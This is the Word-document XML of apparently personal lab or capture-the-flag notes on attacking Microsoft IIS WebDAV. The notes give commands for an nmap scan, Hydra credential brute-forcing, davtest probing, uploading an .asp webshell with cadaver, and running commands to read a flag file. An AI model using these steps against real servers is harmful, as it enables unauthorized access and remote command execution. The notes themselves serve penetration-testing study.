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FFBB" w14:textId="39B6F74E" w:rsidR="00853ABF" w:rsidRDefault="003E4062">
      <w:r w:rsidRPr="003E4062">
        <w:t>Exploiting Microsoft IIS WebDAV</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0500DE10" w14:textId="3B3A2DB9" w:rsidR="00F07686" w:rsidRPr="00854EF6" w:rsidRDefault="00F07686">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00854EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00854EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00854EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05229E6F" w14:textId="7C185C46" w:rsidR="00F07686" w:rsidRDefault="00F07686">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">= internet information service </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD8252B" w14:textId="4C761B3F" w:rsidR="00F07686" w:rsidRDefault="00F07686">
      <w:r>
        <w:t>GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205DCC74" w14:textId="602846CC" w:rsidR="00F07686" w:rsidRDefault="00F07686">
      <w:r>
        <w:t xml:space="preserve">Static &amp; dynamic (asp.net and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D28930" w14:textId="416092CD" w:rsidR="00F07686" w:rsidRDefault="00F07686">
      <w:r>
        <w:t>80/443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDF3E9C" w14:textId="3A84616E" w:rsidR="00F07686" w:rsidRDefault="00F07686">
      <w:r>
        <w:t>Support execution are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B355D32" w14:textId="3FA41D57" w:rsidR="00F07686" w:rsidRDefault="00F07686">
      <w:r>
        <w:t>.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E22329C" w14:textId="08130CB8" w:rsidR="00F07686" w:rsidRDefault="00F07686">
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aspx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CF7C095" w14:textId="4046A245" w:rsidR="00F07686" w:rsidRDefault="00F07686">
      <w:r>
        <w:t>.config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D9F425" w14:textId="2CA94EB4" w:rsidR="00F07686" w:rsidRDefault="00F07686">
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21E81F2E" w14:textId="77777777" w:rsidR="00854EF6" w:rsidRDefault="00854EF6"/>
    <w:p w14:paraId="79E286BA" w14:textId="3AA14712" w:rsidR="00854EF6" w:rsidRPr="00854EF6" w:rsidRDefault="00854EF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00854EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WEBDEV:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EB5D8A" w14:textId="3D37C98B" w:rsidR="00854EF6" w:rsidRDefault="00854EF6">
      <w:r>
        <w:t>Web base distributed authoring and versioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058CFB91" w14:textId="496E79EA" w:rsidR="00DA4F78" w:rsidRDefault="00DA4F78">
      <w:r>
        <w:t>Edit and manage file on remote web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3C745C" w14:textId="4CFDFCD8" w:rsidR="00854EF6" w:rsidRDefault="00854EF6">
      <w:r>
        <w:t xml:space="preserve">Running either on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2958B2E0" w14:textId="273A2045" w:rsidR="00854EF6" w:rsidRDefault="00854EF6">
      <w:r>
        <w:t>80/443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75421C87" w14:textId="6B4674EE" w:rsidR="00854EF6" w:rsidRDefault="00854EF6">
      <w:r>
        <w:t xml:space="preserve">Connect </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server by providing username and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143B7256" w14:textId="77777777" w:rsidR="00DA4F78" w:rsidRDefault="00DA4F78"/>
    <w:p w14:paraId="35A7D00C" w14:textId="442469A5" w:rsidR="00DA4F78" w:rsidRDefault="00DA4F78" w:rsidP="00DA4F78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00854EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WEBDEV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="00854EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D54A46" w14:textId="2DB5BAC8" w:rsidR="00DA4F78" w:rsidRDefault="00DA4F78" w:rsidP="00DA4F78">
      <w:r>
        <w:t xml:space="preserve">Identify whether the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> has configured to run on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> web server. (enumeration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEBB4D8" w14:textId="1300C5E3" w:rsidR="00DA4F78" w:rsidRDefault="00DA4F78" w:rsidP="00DA4F78">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to get legitimate credential (some time enabled or sometime not)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610346DF" w14:textId="505932EF" w:rsidR="00DA4F78" w:rsidRDefault="00DA4F78" w:rsidP="00DA4F78">
      <w:r>
        <w:t>Upload malicious .asp payload to execute arbitrary commands or get reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5612CE" w14:textId="77777777" w:rsidR="00DA4F78" w:rsidRDefault="00DA4F78" w:rsidP="00DA4F78"/>
    <w:p w14:paraId="5B2BF5CD" w14:textId="77777777" w:rsidR="00DA4F78" w:rsidRPr="00DA4F78" w:rsidRDefault="00DA4F78" w:rsidP="00DA4F78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA4F78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456B6328" w14:textId="78E81ED3" w:rsidR="00DA4F78" w:rsidRDefault="00DA4F78" w:rsidP="00DA4F78">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Davtest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (scan authenticate and exploit webdev web server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF3DDE5" w14:textId="4784D149" w:rsidR="00DA4F78" w:rsidRDefault="00DA4F78" w:rsidP="00DA4F78">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cadaver (authenticate , upload and download file</w:t>
      </w:r>
      <w:r w:rsidR="000E695F">
        <w:t xml:space="preserve"> to/from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E695F">
        <w:t>webdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E695F">
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4A565B" w14:textId="77777777" w:rsidR="000E695F" w:rsidRDefault="000E695F" w:rsidP="00DA4F78"/>
    <w:p w14:paraId="3B81D65E" w14:textId="2241C7BB" w:rsidR="000E695F" w:rsidRPr="000E695F" w:rsidRDefault="000E695F" w:rsidP="00DA4F78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E695F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Demo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F6A16D" w14:textId="147F3267" w:rsidR="000E695F" w:rsidRDefault="000E695F" w:rsidP="00DA4F78">
      <w:r>
        <w:t>Nmap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7186247A" w14:textId="367B084B" w:rsidR="000E695F" w:rsidRDefault="000E695F" w:rsidP="000E695F">
      <w:r>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:t>p 80</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>--script=http-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ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B372F98" w14:textId="0E578EC8" w:rsidR="000E695F" w:rsidRPr="000E695F" w:rsidRDefault="000E695F" w:rsidP="000E695F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E695F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263EF494" w14:textId="7ACCDB2A" w:rsidR="000E695F" w:rsidRDefault="000E695F" w:rsidP="000E695F">
      <w:r>
        <w:t xml:space="preserve">By default the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is configured in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6C07E6" w14:textId="1565FCD4" w:rsidR="009F13D5" w:rsidRPr="009F13D5" w:rsidRDefault="009F13D5" w:rsidP="000E695F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F13D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320AB25E" w14:textId="0CBDC59C" w:rsidR="009F13D5" w:rsidRDefault="009F13D5" w:rsidP="000E695F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="591D9164" w14:textId="77777777" w:rsidR="000E695F" w:rsidRDefault="000E695F" w:rsidP="000E695F"/>
    <w:p w14:paraId="66FE46D7" w14:textId="5A83A63D" w:rsidR="009F13D5" w:rsidRPr="009F13D5" w:rsidRDefault="009F13D5" w:rsidP="000E695F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F13D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bruteforece it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CB9519" w14:textId="27F12BDF" w:rsidR="009F13D5" w:rsidRDefault="009F13D5" w:rsidP="000E695F">
      <w:r>
        <w:t>Hydra -L /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/share/wordlist/Metasploit/common_user.txt -P </w:t>
      </w:r>
      <w:r>
        <w:t>L /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/wordlist/Metasploit/common_</w:t>
      </w:r>
      <w:r>
        <w:t>password.</w:t>
      </w:r>
      <w:r>
        <w:t>txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  http-get /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECF2C54" w14:textId="77777777" w:rsidR="009F13D5" w:rsidRDefault="009F13D5" w:rsidP="00DA4F78"/>
    <w:p w14:paraId="1E143936" w14:textId="77777777" w:rsidR="009F13D5" w:rsidRDefault="009F13D5" w:rsidP="00DA4F78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F13D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Now login:</w:t>
      </w:r>
      <w:r w:rsidRPr="009F13D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E08C41D" w14:textId="25C1355A" w:rsidR="009F13D5" w:rsidRDefault="009F13D5" w:rsidP="00DA4F78">
      <w:pPr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devtest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B288F8B" w14:textId="03617C77" w:rsidR="009F13D5" w:rsidRDefault="009F13D5" w:rsidP="00DA4F78">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Devtest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (also tell that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>devtest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is running or not)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626BEA45" w14:textId="06089AF2" w:rsidR="009F13D5" w:rsidRDefault="009F13D5" w:rsidP="00DA4F78">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Devtest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00167EB4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://ip_address/webdev</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8A3537" w14:textId="77777777" w:rsidR="00FD50F2" w:rsidRDefault="009F13D5" w:rsidP="009F13D5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Devtest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>-auth bob</w:t>
      </w:r>
      <w:r w:rsidR="00FD50F2">
        <w:t xml:space="preserve">:password:123321 </w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00FD50F2" w:rsidRPr="00167EB4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://ip_address/webd</w:t>
        </w:r>
        <w:r w:rsidR="00FD50F2" w:rsidRPr="00167EB4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>a</w:t>
        </w:r>
        <w:r w:rsidR="00FD50F2" w:rsidRPr="00167EB4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>v</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="223797BC" w14:textId="4564A293" w:rsidR="009F13D5" w:rsidRDefault="00FD50F2" w:rsidP="009F13D5">
      <w:r>
        <w:t xml:space="preserve"># tell which file we can upload </w:t>
      </w:r>
      <w:r w:rsidR="009F13D5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and execute .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4812FEB9" w14:textId="77777777" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="009F13D5"/>
    <w:p w14:paraId="1E410532" w14:textId="0EA012E3" w:rsidR="00FD50F2" w:rsidRPr="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="009F13D5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD50F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">To upload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD50F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD50F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032B96A1" w14:textId="5E3C4AD8" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="009F13D5">
      <w:r w:rsidRPr="00FD50F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use cadaver:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cadaver – help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED7E428" w14:textId="3D3F53BC" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="009F13D5">
      <w:r>
        <w:t xml:space="preserve">Cadaver </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00167EB4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://ip_address/webdav</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29170670" w14:textId="010A118B" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="009F13D5">
      <w:r>
        <w:t>Bob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C01C08" w14:textId="2A5476DF" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="009F13D5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Password_123321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A51F910" w14:textId="1F9ED399" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="009F13D5">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6942DF6A" w14:textId="77777777" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="009F13D5"/>
    <w:p w14:paraId="4683350A" w14:textId="4EC2ECE2" w:rsidR="00FD50F2" w:rsidRPr="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="009F13D5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD50F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Open new terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFC71D3" w14:textId="77777777" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="009F13D5"/>
    <w:p w14:paraId="6FA76E33" w14:textId="29FF20AB" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="009F13D5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webshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60297625" w14:textId="0CD46DAC" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="009F13D5">
      <w:r>
        <w:t xml:space="preserve"># as we are only allow to execute the .asp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> so look at this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCF8F52" w14:textId="11AF097A" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="00FD50F2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webshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A444370" w14:textId="77777777" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="00FD50F2"/>
    <w:p w14:paraId="33081C45" w14:textId="6A1ADAD8" w:rsidR="00FD50F2" w:rsidRPr="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="00FD50F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD50F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cadaver:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797E2320" w14:textId="43606F07" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="00FD50F2">
      <w:r>
        <w:t xml:space="preserve">Put </w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/asp</w:t>
      </w:r>
      <w:r>
        <w:t>/webshells.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C2A41C" w14:textId="77777777" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="00FD50F2"/>
    <w:p w14:paraId="01B364D3" w14:textId="43D4F4EA" w:rsidR="00FD50F2" w:rsidRPr="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="00FD50F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD50F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF9BFE8" w14:textId="50E95092" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="00FD50F2">
      <w:r>
        <w:t>Click the webshells.asp and get the shell to execute the commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D0299A" w14:textId="7E427F0C" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="00FD50F2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03E7B116" w14:textId="268EA62B" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="00FD50F2">
      <w:r>
        <w:t>Ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C70F7" w14:textId="0DDD8654" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="00FD50F2">
      <w:r>
        <w:t>Dir C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20001253" w14:textId="159A4C95" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="00FD50F2">
      <w:r>
        <w:t>Type C:\flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF52E4A" w14:textId="77777777" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="00FD50F2"/>
    <w:p w14:paraId="680E1183" w14:textId="77777777" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="00FD50F2"/>
    <w:p w14:paraId="5CDC000B" w14:textId="77777777" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="009F13D5"/>
    <w:p w14:paraId="2E2DB17F" w14:textId="77777777" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="009F13D5"/>
    <w:p w14:paraId="043F89A0" w14:textId="77777777" w:rsidR="00FD50F2" w:rsidRDefault="00FD50F2" w:rsidP="009F13D5"/>
    <w:p w14:paraId="238B1E26" w14:textId="77777777" w:rsidR="009F13D5" w:rsidRDefault="009F13D5" w:rsidP="00DA4F78"/>
    <w:p w14:paraId="2EE4EFA2" w14:textId="77777777" w:rsidR="009F13D5" w:rsidRPr="009F13D5" w:rsidRDefault="009F13D5" w:rsidP="00DA4F78"/>
    <w:p w14:paraId="6F592458" w14:textId="305A9509" w:rsidR="000E695F" w:rsidRDefault="009F13D5" w:rsidP="00DA4F78">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEF3493" w14:textId="77777777" w:rsidR="000E695F" w:rsidRDefault="000E695F" w:rsidP="00DA4F78"/>
    <w:p w14:paraId="7A7D0FFD" w14:textId="77777777" w:rsidR="000E695F" w:rsidRDefault="000E695F" w:rsidP="00DA4F78"/>
    <w:p w14:paraId="01151526" w14:textId="77777777" w:rsidR="00DA4F78" w:rsidRDefault="00DA4F78" w:rsidP="00DA4F78"/>
    <w:p w14:paraId="194DC50A" w14:textId="77777777" w:rsidR="00DA4F78" w:rsidRDefault="00DA4F78" w:rsidP="00DA4F78"/>
    <w:p w14:paraId="68EBBCC3" w14:textId="77777777" w:rsidR="00DA4F78" w:rsidRDefault="00DA4F78" w:rsidP="00DA4F78"/>
    <w:p w14:paraId="755274C9" w14:textId="77777777" w:rsidR="00DA4F78" w:rsidRDefault="00DA4F78" w:rsidP="00DA4F78"/>
